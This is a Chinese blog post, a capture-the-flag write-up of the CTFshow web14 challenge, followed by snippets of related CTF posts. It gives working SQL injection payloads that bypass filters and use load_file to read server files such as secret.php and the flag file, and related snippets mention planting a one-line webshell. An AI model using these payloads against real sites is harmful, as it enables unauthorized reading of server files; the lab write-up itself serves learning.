刷题之旅第34站,CTFshow web14

最新推荐文章于 2024-05-02 02:56:40 发布
最新推荐文章于 2024-05-02 02:56:40 发布
阅读量2.2k 收藏 3
点赞数 9
分类专栏: 刷题之旅100站
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45940434/article/details/104358952
版权

感谢ctf show平台提供题目
提交命令,得到了php文件。

?c=3

在这里插入图片描述

我们打开这个php文件看看,是个查询界面。
在这里插入图片描述
通过测试,我们发现 information_schema.columnsinformation_schema.tables均被过滤了,那么可能flag并不是在数据库中。

我们使用sql 的 load_file 命令,进行读文件。在前面我们看到了有个secret.php文件。
在这里插入图片描述
我们尝试进行读取这个文件。

here_1s_your_f1ag.php?query=100/**/union/**/select/**/load_file('/var/www/html/secret.php')

在这里插入图片描述

得到了php文件的内容。

<script>alert('<!-- ReadMe -->
<?php
$url = 'here_1s_your_f1ag.php';
$file = '/tmp/gtf1y';
if(trim(@file_get_contents($file)) === 'ctf.show'){
	echo file_get_contents('/real_flag_is_here');
}')</script>

通过读这段代码,我们发现flag 就存在于根目录下的 /real_flag_is_here文件

同样的套路,我们进行读取这个文件。

/here_1s_your_f1ag.php?query=100/**/union/**/select/**/load_file('/real_flag_is_here')

在这里插入图片描述

flag就拿到手了。

结语:
菜鸡的cc师傅,将会持续写出100篇高质量的CTF题目,供大家进行CTF的入门以及进阶,如果觉得文章对您有所帮助,欢迎关注一下cc师傅。

原创文章不易,点个赞再走吧。
在这里插入图片描述

圆圈勾勒成指纹
关注
  • 9
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
[SWPUCTF 2018]SimplePHP
feng的博客
12-24 526
知识点 PHP的phar反序列化的POP链构造。 WP 这是一道不难的phar反序列化,我个人觉得卡着我的点就是最后要读的文件名,我写程f1ag.php读不出来,一看WP是/var/www/html/f1ag.php,才恍然大悟。 首先进入环境,发现有文件读取和文件上传两个功能,而且f12提示了flag在f1ag.php里面,因此大概率就是要去读f1ag.php这个文件,但是文件读取过滤了f1ag,不能直接读,但是可以把其他文件的源码都读到,比较有用的三个文件源码如下: <?php //file.
ctfshow-WEB-web14( 利用数据库读写功能读取网敏感文件)
wangyuxiang946的博客
09-07 1万+
ctf.show WEB模块第14关是一个SQL注入漏洞, 绕过switch循环后可以拿到一个登录界面, 登录界面存在SQL注入, 脱库以后会提示flag在另一个文件中, 利用数据库的文件读写功能读取文件内容即可拿到flag 开局是一个switch循环, 需要传递参数 c, 参数对应的执行结果有四种: '$url', '@A@', $url, "$url" ; 前两个是字符串, 没啥用, 作者的目的应该是想让我们输出后两个 $url 的其中一个, 但输出之前还有个sleep(), 选的不合适..
ctfshow-萌新-web14( 曲线救国-POST请求绕过获取网敏感信息)_ctf秀web14萌新
最新发布
2401_84264244的博客
05-02 506
萌新模块 web14关, 此关卡是一个代码执行漏洞, 重点在于命令执行函数的利用方式, 源码中过滤比较严格, 尤其是过滤了分号;之后, 虽然可以用?>来代替分号, 但这样一来就只能执行一行代码, 难度较大, 需要注意的是, 源码中的过滤只针对GET请求的参数, 而未对POST请求的参数做限制, 这里推荐曲线救国, GET请求传递一句话木马, 然后在POST请求中传递参数执行系统命令, 从而获取 flag来到页面后展示了部分源码, 并提示 flag 就在 config.php文件中。
ctf.show_web(1-14)wp
qq_73767109的博客
03-28 524
ctf.show_web(1-14) 详细解思路及部分脚本
ctfshow web模块 web11~web14
Goodric的博客
07-23 1670
打开环境,可输入密码登录。 并且给出了源码, 过滤了这些字符: > $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; 满足这个条件时,输出 flag :
ctfweb入门(13-14)
qq_62046696的博客
06-16 703
进入目是个文件上传的目,尝试了一番文件上传漏洞利用的方法后,没有啥突破,可能有啥隐藏的目录,尝试源码泄露利用的方法,在输入upload.php.bak时成功下载下来源码。 .bak文件是备份文件。 这里列举一下常见的源码泄露 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏,还有以.phps .bak结尾的网页 在web没有头绪的时候可以尝试可能会有奇效。 源码如下: 文件的大小要小于等于24,名字长度小于等于9,后缀长度小于等于3,并且最要命的是后缀和名字都不能包含php。我们肯定是
leetcode:记录
03-15
记录 # 标 解决方案 主意 105 哈希表;前序第一位为根,递归 172 零由5得到,n / 5为有1个5的个数,再/ 5为有2个5的个数,以此类推 ZJ_3 距离(递归法时间不过,用动态规划) 85 1739 1 \ 3 \ 6 \ 10 \...
leetcode:开始LeetCode
04-27
密码开始LeetCode列表=====>开始于2015-09-06 <=====反向链表II 重新订购清单k组中的反向节点轮换清单排序清单成对交换节点=====>结束于2015-09-30 <====== 种类=====>从2015-10-08开始<===== 2个...
leetcode:leetcode的
07-01
leetcode leetcode的 我是按照官网给的Tag来的,难度从易到难 会考虑用C++/Java/Python来实现,找工作必备 如果有问,欢迎提issue,也可以email:
LeetCodeJourney:LeetCode
03-06
我的LeetCode之路 这个仓库用来存放我在LeetCode的解法和思路。
LeetCode_Daily:记录LeetCode每日
03-21
LeetCode_Daily记录自己LeetCode每日(持续更新中...) 1. Leetcode译文#译文类名艰难方法标签1个简单双指针,地图映射斑点,哈希表11盛最多水的容器中等双指针斑点,双指针34在排序前后中查找元素的第一个...
[ctfshow]入门2
qq_61109509的博客
01-20 2041
web14(默认配置) web15(社会工程学) web16(探针泄露) 什么是雅黑探针,以及雅黑探针的使用方法 web17(真实ip) wed18(js小游戏) web19(数据库泄露) 解法一hackbar 注意是Post, , 解法二:抓包 抓包后发现pazzword里的密码和原先不一样,应该是加密所致,改成原先密码出flag 解法三:ASC加密 AES解密网址 对AES理解:注意是AES/CBC/... 源代码里出现了密钥和偏移量 web20 mdb文件是早期..
CTFshow web入门——爆破
小元砸的博客
01-24 4629
web 21 一.涉及工具: burp suit burp suit 使用教程 二.解思路: 1.随便输一个密码和用户名抓包一下 2.base64解密一下发现账号密码的形式为 账号:密码,根据目提示我们用自定义迭代器爆破,使用方法参考:Custom iterator的使用 注:下面爆破用的字典是目所提供的 3.爆破出结果 web 22 一.涉及知识点: 子域名爆破(此不能爆破出来)在线子域名爆破 二.解思路: 直接点开View Hint(提示)即可得到答案 web 23 一.涉及工具: p
CTFshow php特性 web141
Kradress的博客
12-18 528
目录源码思路解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-17 19:28:09 */ #error_reporting(0); highlight_file(__FILE__); if(isset($_GET['v1']) && i
CTF show WEB14
羽的博客
02-18 2755
目地址:https://ctf.show 对于这个第一个坑要过的话必须得了解php的switch case语句。 在这里举个例子: $number=1; switch ($number) { case "1": echo "one"; case "2": echo "two"; case "3" echo "three"...
ctfshow学习记录-web入门(php特性137-146)
龟速更新的九某人
08-01 1099
ctfshow学习记录-web入门(php特性web137-web146)
文件的读写基本操作
热门推荐
范高伦的博客
09-07 1万+
一、文件是计算机中数据持久化存储的表现形式 读写文件标准操作格式1: 1、打开文件:file1 = open('文件名','读写模式') 2、操作文件 3、关闭文件:file1.close() 文件操作完毕后必须关闭,否则长期保持对文件的连接状态,造成内存溢出的现象发生 读写文件操作格式2: # 1、打开文件 file1 = open('demo.txt','w') # 2、操作文件 file1.write('hello world') # 3、关闭文件 file1.close() 1、打开文件:wi
CTFshow-Web入门-Web1-20 (信息收集完结篇)
m0_61155226的博客
03-07 7530
CTFshow-Web入门-Web11-20 (信息收集完结篇)
ctfshow web 14 sql注入
m0_46412682的博客
07-16 409
ctfshow web 14 sql注入 开始的页面是一段代码: 这是get传参,/?c=1 sleep一秒后输出$url /?c=2也会输出@A@,有5555 4444 333但是不可能等这么久,直接输 /?c=3,出现 @A@here_1s_your_f1ag.php@A@ 那打开这个文件,这是一个查询的页面 输入1回显是admin,url中可能存在sql注入 按F12查看源代码过滤了/information_schema.tables|information_schema.colum
ctfshow web353
08-24
- *1* *2* *3* [CTFshow日记-WEB-SSRF(web351-360)SSRF总结](https://blog.csdn.net/q20010619/article/details/120536552)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值